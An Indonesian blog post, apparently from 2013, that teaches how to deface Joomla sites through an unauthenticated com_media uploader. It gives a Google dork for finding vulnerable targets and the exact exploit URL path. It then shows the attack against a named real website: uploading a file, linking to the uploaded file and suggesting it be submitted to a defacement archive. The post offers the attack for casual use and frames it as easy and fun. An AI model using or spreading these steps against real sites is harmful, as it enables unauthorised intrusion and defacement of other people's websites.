Selasa, 21 Mei 2013

Teknik Exploit Joomla | com_media

Assalamualaikum....


Berhubung udah banyak banget yang share, jadi saya juga ga mau ketinggalan,, hehehe Nah, topic kali ini membahas mengenai Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joomla.. :) pada penasaran gimana caranya? so easy kok :)

Dork : inurl:com_media site:com


Exploit: /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Pertama sobat cari dah targetnya dulu di google dengan memanfaatkan dork diatas, dan kalo bisa dork tersebut dikembangkan lagi yah, biar bisa nemu target yang fresh :)


Disini saya sudah menemukan tergetnya : http://www.rivit.ca

Nah, sekarang kita  tambahin aja exploitnya, jadinya begini:

http://www.rivit.ca/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

 maka akan terlihat seperti gambar berikut:



Selanjutnya sobat tinggal upload file yang sobat inginkan di bagian uploader..


Note: file yang bisa diupload berextensi .txt .jpg .gif .png. Untuk html dan php tidak bisa. 

kalo berhasil, akan muncul keterangan seperti berikut:


Nah, untuk melihat hasil file yang sudah kita upload di sini: site.com/images/file
cth: http://www.rivit.ca/images/idca.txt
lihat hasil file yang sudah saya upload tadi :) tinggal Submit aja di deface archiver :p


Sip, segitu aja artikel yang bisa berikan kali ini, mudah2an bermanfaat :)

Content Creator: Onix AQua